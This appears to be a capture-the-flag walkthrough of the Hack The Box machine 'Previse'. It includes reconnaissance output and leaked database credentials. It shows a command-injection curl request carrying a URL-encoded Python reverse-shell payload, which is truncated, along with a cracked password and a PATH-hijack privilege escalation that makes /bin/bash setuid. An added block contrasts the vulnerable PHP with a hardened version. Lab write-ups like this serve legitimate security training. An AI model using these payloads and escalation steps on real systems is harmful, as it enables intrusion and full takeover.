Machine Previse - Active - Easy

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzzing
  • no extension
  • php extension
    • we found some php files that need auth to be seen
    • config.php
    • nav.php probably lists the php files
    • accounts.php
      • there is a redirect, but you still see the page in curl
      • we could do a POST to create a new user/password :devil:
      • YEEY we got a user :D
  • txt extension
inspecting web page
  • there is a login
  • it says it is a file service
  • it is using PHP sessions (PHPSESSID)
  • no js or comments
Step 2: what we can do with an admin user…
  • there is a file uploaded by newguy
    • there is a config.php with mysql credentials
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';

in the code we see this


$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

which is a command injection: whatever we put in delim is passed straight to the shell, so we can execute whatever we want :)
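As an added example (not the box's own source), here is the delim handling from above as the page shows it, next to a hardened version; the delimiter names and the assumption that delim only selects a field separator for log_process.py are mine:

```php
<?php
// Added example, not code from the Previse box. Assumed: delim is meant to
// select a field separator for log_process.py, so a fixed allowlist suffices.

// Vulnerable (as on the page): the POST value is interpolated into a shell
// command line, so shell metacharacters such as $( ) or ; are executed by /bin/sh.
function run_log_process_vulnerable(string $delim): string
{
    return (string) exec("/usr/bin/python /opt/scripts/log_process.py {$delim}");
}

// Hardened: the user picks a delimiter *name*; only allowlisted values ever
// reach the command, and the command is started without a shell.
const ALLOWED_DELIMS = ['comma' => ',', 'space' => ' ', 'tab' => "\t"];

function run_log_process_safe(string $delimName): string
{
    if (!array_key_exists($delimName, ALLOWED_DELIMS)) {
        throw new InvalidArgumentException('unknown delimiter: ' . $delimName);
    }

    // PHP >= 7.4: passing an array to proc_open bypasses /bin/sh entirely, so
    // metacharacters in the argument are never interpreted.
    $argv = ['/usr/bin/python', '/opt/scripts/log_process.py', ALLOWED_DELIMS[$delimName]];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start log_process.py');
    }
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    if (proc_close($proc) !== 0) {
        throw new RuntimeException('log_process.py failed');
    }
    return $stdout;
}

// On PHP < 7.4, where only a string command is possible, keep the allowlist
// check and wrap the argument in escapeshellarg():
//   exec('/usr/bin/python /opt/scripts/log_process.py '
//        . escapeshellarg(ALLOWED_DELIMS[$delimName]));

// Usage from the request handler: validate, never interpolate.
echo run_log_process_safe($_POST['delim'] ?? '');
```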

curl 'http://10.10.11.104/logs.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.11.104' -H 'Connection: keep-alive' -H 'Referer: http://10.10.11.104/file_logs.php' -H 'Cookie: PHPSESSID=t3t07dbpsn2et1o41iapan02ch' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'delim=%24%28python%20-c%20%27import%20socket%2Csubprocess%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.conn

we got our shell :)

Step 3: we are www-data now what?
  • we can't see the user flag yet :(
  • we can connect to the db and get the password hash
  • ,'m4lwhere','$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.'
  • hash: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
  • we can crack it with john the ripper: user m4lwhere, password ilovecody112235!
Step 4: to be root …
  • sudo -l
    • we can execute a script as root
    • the binaries in the script don't have a full path
    • so we can abuse the PATH env variable to run our own gzip as root :)
$ export PATH=$(pwd):$PATH
$ cat /tmp/gzip
#!/bin/bash
chmod u+s /bin/bash
$ sudo /opt/scripts/access_backup.sh